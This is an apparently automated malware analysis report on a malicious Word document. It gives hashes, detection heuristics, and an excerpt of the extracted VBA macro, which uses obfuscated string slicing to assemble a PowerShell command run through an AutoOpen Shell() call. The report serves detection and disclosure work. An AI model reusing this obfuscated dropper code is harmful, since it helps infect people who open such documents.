Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bce09cdf8ea04b3…

MALICIOUS

Office (OLE)

179.0 KB Created: 2018-05-21 18:06:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 5d62f4efbd9e9b78ae7269117e2f0bf5 SHA-1: 18f5fbe2d32ac62512bbafa53140c4a5471ebd54 SHA-256: 6bce09cdf8ea04b31d6854c25b8a49c06bdbdc484c7124f06ed4625be6267beb
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is a Microsoft Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The ClamAV detection 'Doc.Dropper.Agent-6550711-0' further supports its malicious nature. The macro appears to be constructing a PowerShell command, likely to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6550700-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6550700-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 205659 bytes
SHA-256: c807a53e51d1486ab3d0439e7db5f87adb1a450920171dad1ae9341e6c455afd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dbjmuzZFWV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JLYTXboIp()

On Error Resume Next
kHmrrJTC = (AATfKzIqw - CDbl(618155) + iQrclAPhb + Fix(nOccQk / CLng(652730 * Sqr(FwoYUjuJO))) - 782067 / Sin(OTwztO - wIsfAqbcr - 727513 + CLng(rlXqOaVDuK)) * 509199 * Fix(618155))
zFECi = "ErJY5]xJ6uQsjiLt( $GnTxioH0wpMgENV:comSpec[4,15,2wAcuV5ltbjhr1owershell & HDRmpous6tB3D1UIO7dl-y5IwZdDUlmM5d"
amoNzsuUiTO = Left(Right(zFECi, 46), 12) + CStr(Left(Right(zFECi, 92), 3)) + Left(Right(zFECi, 77), 18) + Left(Right(zFECi, 104), 2) + CStr(Left(Right(zFECi, 14), 1))

QlTUJJScWqI = "w2 ((xRgC70nsadaxRg((('fVkFOZUUQwjoIN'') SCVgjYwseUHlwGmqx0MKXetyqE6OVl7oaqJwhylBJVu0De"
GSDuOzRXTX = CStr(Left(Right(QlTUJJScWqI, 54), 8)) + Left(Right(QlTUJJScWqI, 68), 4) + Left(Right(QlTUJJScWqI, 85), 17)

wicYMHjb = Chr(43)
spHALVSc = "dxRg6swENxRgrJka5tW2l9Cf"
jKcPCn = CStr(Left(Right(spHALVSc, 15), 3)) + CStr(Left(Right(spHALVSc, 19), 1)) + Left(Right(spHALVSc, 24), 4)

isQtRv = Chr(43)
jIKOHWRTW = " = 'gawExRHBrJka5tW2l"
OzlPBKsnfD = Left(Right(jIKOHWRTW, 13), 2) + Left(Right(jIKOHWRTW, 17), 1) + CStr(Left(Right(jIKOHWRTW, 21), 4))

riXTiM = Chr(43)
mNUEqGazdI = "g2cR'xwENTHB"
sADwqnrakji = CStr(Left(Right(mNUEqGazdI, 8), 2)) + Left(Right(mNUEqGazdI, 9), 1) + CStr(Left(Right(mNUEqGazdI, 12), 1))

iFAsO = Chr(43)
RHzXaZIIcZ = (qmJtHU - CDbl(598014) + bfHSQmj + Fix(uVVzijG / CLng(330987 * Sqr(wSdUE))) - 411382 / Sin(MnBAsUWjUC - dzPfzqKqI - 930972 + CLng(nndqbkjMa)) * 586237 * Fix(598014))
TKJwDrMjR = "(xRg6&wENxRgrJka5tW2l9Cf"
kMzbVFGc = CStr(Left(Right(TKJwDrMjR, 15), 3)) + CStr(Left(Right(TKJwDrMjR, 19), 1)) + Left(Right(TKJwDrMjR, 24), 4)

BrsDzBtO = Chr(43)
kLwvKG = "'2cgxRwENTHB"
tFJikO = CStr(Left(Right(kLwvKG, 8), 2)) + Left(Right(kLwvKG, 9), 1) + CStr(Left(Right(kLwvKG, 12), 1))

kVqQErGViL = Chr(43)
mFkGcmvU = "xRgVKa'wNTHBrJka5t"
VIICjEJCvcl = CStr(Left(Right(mFkGcmvU, 12), 2)) + Left(Right(mFkGcmvU, 14), 1) + CStr(Left(Right(mFkGcmvU, 18), 3))

hXiSwQ = Chr(43)
fEVLYrDzYN = "nxRg60wENxRgrJka5tW2l9Cf"
Cclokj = CStr(Left(Right(fEVLYrDzYN, 15), 3)) + CStr(Left(Right(fEVLYrDzYN, 19), 1)) + Left(Right(fEVLYrDzYN, 24), 4)
KItaZHFRJUk = (XTPsmtK - CDbl(184297) + MWdzY + Fix(HqHcvS / CLng(708774 * Sqr(kYISwkdSH))) - 452673 / Sin(jnmjXKMmn - Emofu - 470966 + CLng(LzOJj)) * 778674 * Fix(184297))
bEhpFYpiPX = Chr(43)
PVEFks = "wK0VgaxRNTHBrJka5t"
jnzBEGRdJI = CStr(Left(Right(PVEFks, 12), 2)) + Left(Right(PVEFks, 14), 1) + CStr(Left(Right(PVEFks, 18), 3))

bhvlYmHfWAT = Chr(43)
PrYmmi = "g2Rx6awEN"
RXJSzhI = Left(Right(PrYmmi, 6), 1) + Left(Right(PrYmmi, 7), 1) + Left(Right(PrYmmi, 9), 1)

Fjfnz = Chr(43)
hLIWw = "jxRg2JXV6EkeXawK0EF'ntAO"
Ojjvvb = Left(Right(hLIWw, 23), 3) + CStr(Left(Right(hLIWw, 10), 3)) + CStr(Left(Right(hLIWw, 13), 1)) + Left(Right(hLIWw, 5), 1)
BDosBIlJYYw = (FskjuKYf - CDbl(989527) + FiVioWcik + Fix(vdwZcslzli / CLng(876770 * Sqr(iCnamYnwjk))) - 382392 / Sin(mPvZTKN - JbojBwGSIr - 17 + CLng(Mnzqac)) * 60831 * Fix(989527))
hTtRo = Chr(43)
dmYnHrMhrt = "'wpj10aKJXV6"
zMwkZJipLz = Left(Right(dmYnHrMhrt, 12), 2) + CStr(Left(Right(dmYnHrMhrt, 5), 1)) + Left(Right(dmYnHrMhrt, 7), 1)

FPGJcRaPjMB = Chr(43)
PBWCCcCcoj = "gawK0V6EkMXabeMjFhnw-obdxRwOuESP8"
wJjcHWIb = Left(Right(PBWCCcCcoj, 31), 3) + Left(Right(PBWCCcCcoj, 14), 4) + CStr(Left(Right(PBWCCcCcoj, 18), 1)) + Left(Right(PBWCCcCcoj, 9), 2) + Left(Right(PBWCCcCcoj, 33), 1)

sjkAQrKjz = Chr(43)
uIwQMFFL = "pxR3a2JXVgRkgexbeMEFh"
ElSRCvsFBTC = CStr(Left(Right(uIwQMFFL, 20), 2)) + CStr(Left(Right(uIwQMFFL, 9), 3)) + Left(Right(uIwQMFFL, 11), 1) + Left(Right(uIwQMFFL, 12), 1)

awmwbt = Chr(43)
aSLFkUCJj = "jxRg2JXV6EkRXacwxEFgntAO"
aSDVMMjWJ = Left(Right(aSLFkUCJj, 23), 3) + CStr(Left(Right(aSLFkUCJj, 10), 3)) + CStr(Left(Right(aSLFkUCJj, 13), 1)) + Left(Right(aSLFkUCJj, 5), 1)
NSPRCYiA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.